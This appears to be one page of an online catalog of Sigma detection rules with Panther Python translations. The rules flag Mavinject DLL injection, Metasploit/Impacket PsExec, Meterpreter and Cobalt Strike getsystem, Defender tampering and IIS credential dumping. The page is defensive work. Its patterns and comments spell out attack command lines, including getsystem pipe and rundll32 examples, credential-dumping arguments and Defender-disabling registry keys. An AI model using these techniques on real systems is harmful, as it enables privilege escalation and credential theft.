status test author frack113, Florian Roth id 4f73421b-5a0b-4bbf-a892-5a7fb99bea66
panther query
def rule(event):
    if all(
        [
            " /INJECTRUNNING " in event.deep_get("CommandLine", default=""),
            not event.deep_get("ParentImage", default="")
            == "C:\\Windows\\System32\\AppVClient.exe",
        ]
    ):
        return True
    return False
view Sigma YAML
title: Mavinject Inject DLL Into Running Process
id: 4f73421b-5a0b-4bbf-a892-5a7fb99bea66
related:
    - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
      type: obsolete
status: test
description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md
    - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e
    - https://twitter.com/gN3mes1s/status/941315826107510784
    - https://reaqta.com/2017/12/mavinject-microsoft-injector/
    - https://twitter.com/Hexacorn/status/776122138063409152  # Deleted tweet
    - https://github.com/SigmaHQ/sigma/issues/3742
    - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection
author: frack113, Florian Roth
date: 2021-07-12
modified: 2022-12-05
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055.001
    - attack.t1218.013
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: ' /INJECTRUNNING '
    filter:
        ParentImage: 'C:\Windows\System32\AppVClient.exe' # This parent is the expected process to launch "mavinject"
    condition: selection and not filter
falsepositives:
    - Unknown
level: high
high
Metasploit Or Impacket Service Installation Via SMB PsExec
Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
status test author Bartlomiej Czyz, Relativity id 6fb63b40-e02a-403e-9ffd-3bcc1d749442
panther query
import re


def rule(event):
    if all(
        [
            event.deep_get("EventID", default="") == 4697,
            # Regex matches a service binary such as %systemroot%\ABCDEFGH.exe:
            # a single literal backslash and a literal dot, mirroring the Sigma
            # pattern (the previous rendering was double-escaped and never matched).
            re.match(
                r"^%systemroot%\\[a-zA-Z]{8}\.exe$",
                event.deep_get("ServiceFileName", default=""),
            ),
            re.match(
                r"(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)",
                event.deep_get("ServiceName", default=""),
            ),
            event.deep_get("ServiceStartType", default="") == 3,
            event.deep_get("ServiceType", default="") == "0x10",
            not event.deep_get("ServiceName", default="") == "PSEXESVC",
        ]
    ):
        return True
    return False
view Sigma YAML
title: Metasploit Or Impacket Service Installation Via SMB PsExec
id: 6fb63b40-e02a-403e-9ffd-3bcc1d749442
related:
    - id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0
      type: derived
status: test
description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
references:
    - https://bczyz1.github.io/2021/01/30/psexec.html
author: Bartlomiej Czyz, Relativity
date: 2021-01-21
modified: 2022-10-05
tags:
    - attack.lateral-movement
    - attack.t1021.002
    - attack.t1570
    - attack.execution
    - attack.t1569.002
logsource:
    product: windows
    service: security
    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697
detection:
    selection:
        EventID: 4697
        ServiceFileName|re: '^%systemroot%\\[a-zA-Z]{8}\.exe$'
        ServiceName|re: '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)'
        ServiceStartType: 3  # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697
        ServiceType: '0x10'
    filter:
        ServiceName: 'PSEXESVC'
    condition: selection and not filter
falsepositives:
    - Possible, different agents with an 8 character binary and a 4, 8 or 16 character service name
level: high
high
Metasploit SMB Authentication
Alerts on Metasploit host's authentications on the domain.
status test author Chakib Gzenayi (@Chak092), Hosni Mribah id 72124974-a68b-4366-b990-d30e0b2a190d
panther query
import re


def rule(event):
    if any(
        [
            all(
                [
                    event.deep_get("EventID", default="") in [4625, 4624],
                    event.deep_get("LogonType", default="") == 3,
                    event.deep_get("AuthenticationPackageName", default="") == "NTLM",
                    re.match(r"^[A-Za-z0-9]{16}$", event.deep_get("WorkstationName", default="")),
                ]
            ),
            all(
                [
                    event.deep_get("EventID", default="") == 4776,
                    re.match(r"^[A-Za-z0-9]{16}$", event.deep_get("Workstation", default="")),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Metasploit SMB Authentication
id: 72124974-a68b-4366-b990-d30e0b2a190d
status: test
description: Alerts on Metasploit host's authentications on the domain.
references:
    - https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb
author: Chakib Gzenayi (@Chak092), Hosni Mribah
date: 2020-05-06
modified: 2024-01-25
tags:
    - attack.lateral-movement
    - attack.t1021.002
logsource:
    product: windows
    service: security
detection:
    selection1:
        EventID:
            - 4625
            - 4624
        LogonType: 3
        AuthenticationPackageName: 'NTLM'
        WorkstationName|re: '^[A-Za-z0-9]{16}$'
    selection2:
        EventID: 4776
        Workstation|re: '^[A-Za-z0-9]{16}$'
    condition: 1 of selection*
falsepositives:
    - Linux hostnames composed of 16 characters.
level: high
high
Meterpreter or Cobalt Strike Getsystem Service Installation - Security
Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
status test author Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems) id ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34
panther query
def rule(event):
    if all(
        [
            event.deep_get("EventID", default="") == 4697,
            any(
                [
                    all(
                        [
                            "/c" in event.deep_get("ServiceFileName", default=""),
                            "echo" in event.deep_get("ServiceFileName", default=""),
                            "\\pipe\\" in event.deep_get("ServiceFileName", default=""),
                            any(
                                [
                                    "cmd" in event.deep_get("ServiceFileName", default=""),
                                    "%COMSPEC%" in event.deep_get("ServiceFileName", default=""),
                                ]
                            ),
                        ]
                    ),
                    all(
                        [
                            "rundll32" in event.deep_get("ServiceFileName", default=""),
                            ".dll,a" in event.deep_get("ServiceFileName", default=""),
                            "/p:" in event.deep_get("ServiceFileName", default=""),
                        ]
                    ),
                    event.deep_get("ServiceFileName", default="").startswith(
                        "\\\\127.0.0.1\\ADMIN$\\"
                    ),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Meterpreter or Cobalt Strike Getsystem Service Installation - Security
id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34
related:
    - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6
      type: derived
status: test
description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
references:
    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
author: Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)
date: 2019-10-26
modified: 2023-11-15
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1134.001
    - attack.t1134.002
logsource:
    product: windows
    service: security
    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697
detection:
    selection_eid:
        EventID: 4697
    selection_cli_cmd:
        # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a
        # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a
        # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a
        ServiceFileName|contains|all:
            - '/c'
            - 'echo'
            - '\pipe\'
        ServiceFileName|contains:
            - 'cmd'
            - '%COMSPEC%'
    selection_cli_rundll:
        # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn
        ServiceFileName|contains|all:
            - 'rundll32'
            - '.dll,a'
            - '/p:'
    selection_cli_share:
        ServiceFileName|startswith: '\\\\127.0.0.1\\ADMIN$\'  # https://twitter.com/svch0st/status/1413688851877416960?lang=en
    condition: selection_eid and 1 of selection_cli_*
falsepositives:
    - Unlikely
level: high
high
Meterpreter or Cobalt Strike Getsystem Service Installation - System
Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
status test author Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems) id 843544a7-56e0-4dcc-a44f-5cc266dd97d6
panther query
def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "Service Control Manager",
            event.deep_get("EventID", default="") == 7045,
            any(
                [
                    all(
                        [
                            "/c" in event.deep_get("ImagePath", default=""),
                            "echo" in event.deep_get("ImagePath", default=""),
                            "\\pipe\\" in event.deep_get("ImagePath", default=""),
                            any(
                                [
                                    "cmd" in event.deep_get("ImagePath", default=""),
                                    "%COMSPEC%" in event.deep_get("ImagePath", default=""),
                                ]
                            ),
                        ]
                    ),
                    all(
                        [
                            "rundll32" in event.deep_get("ImagePath", default=""),
                            ".dll,a" in event.deep_get("ImagePath", default=""),
                            "/p:" in event.deep_get("ImagePath", default=""),
                        ]
                    ),
                    event.deep_get("ImagePath", default="").startswith("\\\\127.0.0.1\\ADMIN$\\"),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Meterpreter or Cobalt Strike Getsystem Service Installation - System
id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6
status: test
description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
references:
    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
author: Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)
date: 2019-10-26
modified: 2023-11-15
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1134.001
    - attack.t1134.002
logsource:
    product: windows
    service: system
detection:
    selection_id:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
    selection_cli_cmd:
        # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a
        # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a
        # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a
        ImagePath|contains|all:
            - '/c'
            - 'echo'
            - '\pipe\'
        ImagePath|contains:
            - 'cmd'
            - '%COMSPEC%'
    selection_cli_rundll:
        # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn
        ImagePath|contains|all:
            - 'rundll32'
            - '.dll,a'
            - '/p:'
    selection_cli_share:
        ImagePath|startswith: '\\\\127.0.0.1\\ADMIN$\'  # https://twitter.com/svch0st/status/1413688851877416960?lang=en
    condition: selection_id and 1 of selection_cli_*
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
high
Microsoft Defender Blocked from Loading Unsigned DLL
Detects the Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs, which may be an attempt to sideload an arbitrary DLL
status test author Bhabesh Raj id 0b0ea3cc-99c8-4730-9c53-45deee2a4c86
panther query
def rule(event):
    if all(
        [
            event.deep_get("EventID", default="") in [11, 12],
            any(
                [
                    event.deep_get("ProcessPath", default="").endswith("\\MpCmdRun.exe"),
                    event.deep_get("ProcessPath", default="").endswith("\\NisSrv.exe"),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Microsoft Defender Blocked from Loading Unsigned DLL
id: 0b0ea3cc-99c8-4730-9c53-45deee2a4c86
status: test
description: Detects the Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs, which may be an attempt to sideload an arbitrary DLL
references:
    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool
author: Bhabesh Raj
date: 2022-08-02
modified: 2022-09-28
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    product: windows
    service: security-mitigations
detection:
    selection:
        EventID:
            - 11
            - 12 # MDE: ExploitGuardNonMicrosoftSignedBlocked
        ProcessPath|endswith:
            - '\MpCmdRun.exe'
            - '\NisSrv.exe'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high
Microsoft Defender Tamper Protection Trigger
Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring"
status stable author Bhabesh Raj, Nasreddine Bencherchali id 49e5bc24-8b86-49f1-b743-535f332c2856
panther query
def rule(event):
    if all(
        [
            event.deep_get("EventID", default="") == 5013,
            any(
                [
                    event.deep_get("Value", default="").endswith(
                        "\\Windows Defender\\DisableAntiSpyware"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Windows Defender\\DisableAntiVirus"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Windows Defender\\Scan\\DisableArchiveScanning"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Windows Defender\\Scan\\DisableScanningNetworkFiles"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Real-Time Protection\\DisableRealtimeMonitoring"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Real-Time Protection\\DisableBehaviorMonitoring"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Real-Time Protection\\DisableIOAVProtection"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Real-Time Protection\\DisableScriptScanning"
                    ),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Microsoft Defender Tamper Protection Trigger
id: 49e5bc24-8b86-49f1-b743-535f332c2856
status: stable
description: Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring"
references:
    - https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection
    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide
author: Bhabesh Raj, Nasreddine Bencherchali
date: 2021-07-05
modified: 2022-12-06
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    product: windows
    service: windefend
detection:
    selection:
        EventID: 5013 # Tamper protection blocked a change to Microsoft Defender Antivirus. If Tamper protection is enabled then, any attempt to change any of Defender's settings is blocked. Event ID 5013 is generated and states which setting change was blocked.
        Value|endswith:
            - '\Windows Defender\DisableAntiSpyware'
            - '\Windows Defender\DisableAntiVirus'
            - '\Windows Defender\Scan\DisableArchiveScanning'
            - '\Windows Defender\Scan\DisableScanningNetworkFiles'
            - '\Real-Time Protection\DisableRealtimeMonitoring'
            - '\Real-Time Protection\DisableBehaviorMonitoring'
            - '\Real-Time Protection\DisableIOAVProtection'
            - '\Real-Time Protection\DisableScriptScanning'
    condition: selection
falsepositives:
    - Administrator might try to disable defender features during testing (must be investigated)
level: high
Convert to SIEM query
high
Microsoft IIS Connection Strings Decryption
Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or similar can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password, using the aspnet_regiis command.
status test author Tim Rauch, Elastic (idea) id 97dbf6e2-e436-44d8-abee-4261b24d3e41
panther query
def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\aspnet_regiis.exe"),
                    event.deep_get("OriginalFileName", default="") == "aspnet_regiis.exe",
                ]
            ),
            "connectionStrings" in event.deep_get("CommandLine", default=""),
            " -pdf" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Microsoft IIS Connection Strings Decryption
id: 97dbf6e2-e436-44d8-abee-4261b24d3e41
status: test
description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or similar can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password, using the aspnet_regiis command.
references:
    - https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-28
modified: 2022-12-30
tags:
    - attack.credential-access
    - attack.t1003
logsource:
    category: process_creation
    product: windows
detection:
    selection_name:
        - Image|endswith: '\aspnet_regiis.exe'
        - OriginalFileName: 'aspnet_regiis.exe'
    selection_args:
        CommandLine|contains|all:
            - 'connectionStrings'
            - ' -pdf'
    condition: all of selection*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high
Microsoft IIS Service Account Password Dumped
Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
status test author Tim Rauch, Janantha Marasinghe, Elastic (original idea) id 2d3cdeec-c0db-45b4-aa86-082f7eb75701
panther query
import re


def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\appcmd.exe"),
                    event.deep_get("OriginalFileName", default="") == "appcmd.exe",
                ]
            ),
            "list " in event.deep_get("CommandLine", default=""),
            any(
                [
                    any(
                        [
                            " /config" in event.deep_get("CommandLine", default=""),
                            " /xml" in event.deep_get("CommandLine", default=""),
                            " -config" in event.deep_get("CommandLine", default=""),
                            " -xml" in event.deep_get("CommandLine", default=""),
                        ]
                    ),
                    all(
                        [
                            any(
                                [
                                    " /@t" in event.deep_get("CommandLine", default=""),
                                    " /text" in event.deep_get("CommandLine", default=""),
                                    " /show" in event.deep_get("CommandLine", default=""),
                                    " -@t" in event.deep_get("CommandLine", default=""),
                                    " -text" in event.deep_get("CommandLine", default=""),
                                    " -show" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            any(
                                [
                                    re.match(
                                        r"^.*:\\.*.*$", event.deep_get("CommandLine", default="")
                                    ),
                                    "password" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                        ]
                    ),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Microsoft IIS Service Account Password Dumped
id: 2d3cdeec-c0db-45b4-aa86-082f7eb75701
status: test
description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
references:
    - https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html
    - https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA
    - https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/
author: Tim Rauch, Janantha Marasinghe, Elastic (original idea)
date: 2022-11-08
modified: 2023-01-22
tags:
    - attack.credential-access
    - attack.t1003
logsource:
    category: process_creation
    product: windows
detection:
    selection_base_name:
        - Image|endswith: '\appcmd.exe'
        - OriginalFileName: 'appcmd.exe'
    selection_base_list:
        CommandLine|contains: 'list '
    selection_standalone:
        CommandLine|contains:
            - ' /config' # https://pbs.twimg.com/media/FgydDAJWIAEio34?format=png&name=900x900
            - ' /xml'
            # We cover the "-" version just in case :)
            - ' -config'
            - ' -xml'
    selection_cmd_flags:
        CommandLine|contains:
            - ' /@t' # Covers both "/@text:*" and "/@t:*"
            - ' /text'
            - ' /show'
            # We cover the "-" version just in case :)
            - ' -@t'
            - ' -text'
            - ' -show'
    selection_cmd_grep:
        CommandLine|contains:
            - ':\*'
            - 'password'
    condition: all of selection_base_* and (selection_standalone or all of selection_cmd_*)
falsepositives:
    - Unknown
level: high
Convert to SIEM query
Showing 751-800 of 3,750